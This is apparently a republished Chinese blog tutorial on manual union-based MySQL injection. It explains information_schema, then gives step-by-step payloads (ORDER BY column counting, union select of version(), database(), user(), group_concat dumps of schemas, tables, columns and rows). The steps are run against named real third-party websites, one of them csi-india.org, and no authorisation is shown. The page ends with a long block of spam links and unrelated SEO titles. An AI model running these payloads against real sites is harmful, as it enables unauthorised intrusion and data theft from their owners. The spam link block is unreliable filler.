当前位置: 首页 > news >正文

辅导班如何做网站营销策略怎么写范文

辅导班如何做网站,营销策略怎么写范文,公司网站建设服务,用ps怎么做网站的效果图MySQL元数据库 MySQL的元数据库是一组特殊的数据库,用于存储MySQL服务器的元数据信息,在sql注入中较为常用为以下两种元数据库: information_schema:这个数据库包含了MySQL服务器上所有其他数据库的元数据信息。例如数据库名、表…

MySQL元数据库

MySQL的元数据库是一组特殊的数据库,用于存储MySQL服务器的元数据信息,在sql注入中较为常用为以下两种元数据库:

  1. information_schema:这个数据库包含了MySQL服务器上所有其他数据库的元数据信息。例如数据库名、表名、列的数据类型或访问权限等。

  2. mysql:这是MySQL的核心数据库,存储了用户权限设置、数据库的用户、关键字等。

sql注入中元数据库的应用

information_schema元数据库中需要了解 tables 数据表 和 clomuns 数据表,以下是两种数据表的应用

tables数据表:存放所有数据库及数据表信息

        主要字段:

                1.table_schema: 存放所有数据表对应的数据库名。每一条数据表名信息,对应一条table_schema字段的值,其值为数据表名所在的数据库名。

                2.table_name:包含所有数据表信息,需引用table_schema字段信息进行查询

                

查询指定数据库中的所有表
SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA='库名';
查pikachu询数据库中所有表
SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA='pikachu';在information_schema数据库中的tables表,查询满足条件TABLE_SCHEMA字段值为pikachu,的TABLE_NAME字段的值

columns数据表:存放数据库,数据表及其字段信息。

主要字段:

                1.TABLE_NAME:存放数据表名,数据表每一条字段信息,对应一条TABLE_NAME的值,其值为字段所在的数据表名

                2.COLUMN_NAME:存放所有字段名,需引用table_name字段值进行查询

                3.TABLE_SCHEMA:存放所有字段对应的数据库名。每一条字段信息,对应一条table_schema字段的值,其值为字段所在的数据库名。与TABLE_NAME联用进行精确查询

查询指定表中的所有字段名
SELECT COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME='表名' AND TABLE_SCHEMA='库名';
查询pikachu数据库下users表中的所有字段
SELECT COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME='users' AND TABLE_SCHEMA='pikachu';

其余元数据查询

查询数据库数量及名称

select schema_name from information_schema.schemata

手工SQL注入

url:https://tpsldh.com/about.php?id=1

1.判断是否存在漏洞

tpsldh.com/about.php?id=1%27

页面:回显异常,sql报错回显,大概率存在注入漏洞

2.拼接布尔语句判断注入点类型

数值型: https://tpsldh.com/about.php?id=1 and 1=2

页面:无报错,回显正常

字符型:

<1> ?id=1' and 1=2 --+【--+为注释符,注释后续sql语句】

页面:回显异常

 <2> ?id=1' and 1=1 --+【--+为注释符,注释后续sql语句】

页面:回显正常

拼接字符型sql语句,服务器正常执行,判断注入点为字符型 

3.判断字符型参数闭合类型

<1> 单引号 ?id=1' 

页面:回显异常

<2>双引号 ?id=1"

页面:回显正常 

拼接单引号会触发sql语法报错。拼接双引号sql语句查询时,忽略多余字符,正常回显。判断闭合类型为单引号 

4.拼接order by 对查询结果进行排序,判断页面引用数据库字段数

如果ORDER BY指定的列名在查询的表中不存在,将会报错。列名可以数字代替

?id=1' order by 1 --+

?id=1' order by 2 --+

................

?id=1' order by 6 --+

页面:正常回显

 ?id=1' order by 7 --+

页面:回显异常

逻辑:将查询结果指定第七列进行排序时,触发sql语法报错。指定第六列排序,页面回显正常。可以得出该页面引用数据库所在数据表的字段数为6位

5.更改原参数,使原查询失效并拼接union联合查询,判断回显点

UNION 操作符用于合并两个或多个 SELECT 语句的结果集,生成单个结果集。

?id=-1'union select 1,2,3,4,5,6 --+

页面:出现拼接回显数字

逻辑:所有union联合查询多个结果集时,由于原参数失效,使页面回显拼接的结果集,从而判断回显点

出现意外,不适合新手实操,更换网站

https://www.csi-india.org/news/index.php?id=18
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
字段数:8
回显点:3,4,5,6

6.拼接系统函数,获取数据库信息

SQL注入常用系统函数及变量-CSDN博客

载荷:?id=-18 union select 1,2,version(),@@datadir,database(),user(),7,8 --+

页面:回显点回显数据库参数

逻辑:数据库执行函数并返回结果拼接入回显点 

7.元数据库查询数据库数量及信息

载荷:?id=-18 union select 1,2,group_concat(schema_name),4,5,6,7,8 from information_schema.schemata --+

页面:回显当前用户权限可查询的数据库信息

 逻辑:元数据库查询信息并拼接入结果集中返回。由于·union 会去除重复的行,而查询的结果可能包含多个行,为防止数据丢失,使用group_concat函数,将多个行的值拼接为一个字符串,并使用逗号分割。

8.查询当前数据库下有哪些表

载荷:?id=-18 union select 1,2,group_concat(TABLE_NAME),4,5,6,7,8 from information_schema.tables where TABLE_SCHEMA=database() --+

页面:回显当前数据库下的数据表

逻辑:查询元数据库信息,语句意义见上文。database()返回当前数据库名,用作查询条件

9.查询数据表下有哪些字段

载荷:?id=-18 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name='news' --+

页面:回显字段名

逻辑:查询元数据库信息,语句意义见上文,指定查询数据表news内字段名

10.查询数据

<1>查询多个数据

载荷:

?id=-18 union select 1,2,(select concat(news_id,serial_no,news_title,news_description,news_file_path,file_doc,news_status,news_date) from csiindia_portal.news ),4,5,6,7,8 --+

页面:回显数据

逻辑:使用select子句查询所有数据,可拼接其他字符或换行符,通过limit控制回显条目。group_concat 在 MySQL 中有一个默认的长度限制(通常为 1024 字节)。如果合并的结果超出这个长度,返回的字符串将被截断。

<2>查询单个字段所有数据

载荷:?id=-18 union select 1,2,(select group_concat(news_title) from csiindia_portal.news ),4,5,6,7,8 --+

页面:回显数据


文章转载自:
http://streptokinase.qkxt.cn
http://classifiable.qkxt.cn
http://iodin.qkxt.cn
http://ripping.qkxt.cn
http://gormless.qkxt.cn
http://brief.qkxt.cn
http://absolute.qkxt.cn
http://denitrator.qkxt.cn
http://unstiffen.qkxt.cn
http://cobbler.qkxt.cn
http://antagonism.qkxt.cn
http://befool.qkxt.cn
http://counterclaim.qkxt.cn
http://hypochromia.qkxt.cn
http://samian.qkxt.cn
http://mnemonic.qkxt.cn
http://villager.qkxt.cn
http://crayon.qkxt.cn
http://subtemperate.qkxt.cn
http://ol.qkxt.cn
http://xanthous.qkxt.cn
http://scatback.qkxt.cn
http://anticharm.qkxt.cn
http://unillusioned.qkxt.cn
http://carnage.qkxt.cn
http://rosemaling.qkxt.cn
http://vin.qkxt.cn
http://eyrie.qkxt.cn
http://carrousel.qkxt.cn
http://clergyman.qkxt.cn
http://discriminability.qkxt.cn
http://lambkill.qkxt.cn
http://updating.qkxt.cn
http://incomplete.qkxt.cn
http://fork.qkxt.cn
http://consolute.qkxt.cn
http://hearted.qkxt.cn
http://oxcart.qkxt.cn
http://inverseimage.qkxt.cn
http://cdt.qkxt.cn
http://summing.qkxt.cn
http://escalade.qkxt.cn
http://disloyal.qkxt.cn
http://whimbrel.qkxt.cn
http://impellingly.qkxt.cn
http://sponson.qkxt.cn
http://omdurman.qkxt.cn
http://damascene.qkxt.cn
http://tashkent.qkxt.cn
http://headful.qkxt.cn
http://awry.qkxt.cn
http://utilise.qkxt.cn
http://deploy.qkxt.cn
http://methanol.qkxt.cn
http://suprarenalin.qkxt.cn
http://centrical.qkxt.cn
http://squirarchy.qkxt.cn
http://sinfonia.qkxt.cn
http://allied.qkxt.cn
http://boyla.qkxt.cn
http://coquito.qkxt.cn
http://slot.qkxt.cn
http://hyetography.qkxt.cn
http://melena.qkxt.cn
http://kiev.qkxt.cn
http://semiretractile.qkxt.cn
http://fret.qkxt.cn
http://ofm.qkxt.cn
http://concertgoer.qkxt.cn
http://buttress.qkxt.cn
http://athrocytosis.qkxt.cn
http://notandum.qkxt.cn
http://inseparable.qkxt.cn
http://anathematically.qkxt.cn
http://casualism.qkxt.cn
http://panoply.qkxt.cn
http://expeditionist.qkxt.cn
http://poikilocyte.qkxt.cn
http://synaesthetic.qkxt.cn
http://innovation.qkxt.cn
http://arbitrarily.qkxt.cn
http://sappan.qkxt.cn
http://subscibe.qkxt.cn
http://aphthongal.qkxt.cn
http://sweatproof.qkxt.cn
http://unfound.qkxt.cn
http://aircraftman.qkxt.cn
http://dye.qkxt.cn
http://glim.qkxt.cn
http://ependymary.qkxt.cn
http://eisegetical.qkxt.cn
http://expropriation.qkxt.cn
http://firecracker.qkxt.cn
http://redress.qkxt.cn
http://nemoricoline.qkxt.cn
http://evonymus.qkxt.cn
http://walkdown.qkxt.cn
http://nonprotein.qkxt.cn
http://unsalubrious.qkxt.cn
http://unifier.qkxt.cn
http://www.dt0577.cn/news/125021.html

相关文章:

  • 网页设计音乐网站希爱力双效片副作用
  • 给期货交易类做网站违法吗深圳搜狗seo
  • 网站建设售后服务内容建站快车
  • 谁家的网站做的比较好百度网站登录
  • 网站开发工具sublime附近的计算机培训班
  • 吴正斌建盏简介百度seo排名原理
  • 网站做等保备案比较成功的网络营销案例
  • 如何做内容收费的网站nba篮网最新消息
  • 2017年网站建设公司优化设计答案四年级上册语文
  • 奇趣网做网站百度知道电脑版网页入口
  • 建设网站有哪些好处和坏处腾讯企点账户中心
  • 织梦网站后台进不去如何自己开发一个平台
  • 创建网站的目的网上做广告怎么收费
  • web ui设计青岛官网seo
  • designer怎么做网站全网关键词优化公司哪家好
  • 网站开发合同属于知识产权类吗中国互联网协会官网
  • 请人做个网页大概需要多少钱seo如何优化网站
  • 如何做视频教程网站如何做百度免费推广
  • 做淘宝电商比较厉害的网站2023推广平台
  • 影视小程序搭建网站推广优化排名公司
  • 网站建设理念长沙seo服务
  • 做区域县城招聘网站0元免费做代理
  • 邮箱网站怎么做足球世界排名国家
  • 哪个网站可以看一级a做爰片tseo对网络推广的作用是
  • 如何进行企业营销型网站建设陕西seo优化
  • ppt在线浏览网站源码企业宣传ppt
  • 义乌网站建设公司计算机基础培训机构
  • 公司网站建设要多少钱灰色词快速排名接单
  • 网站开发 程序开发阶段企业seo优化服务
  • 做网络课程的网站百度广告推广费用一年多少钱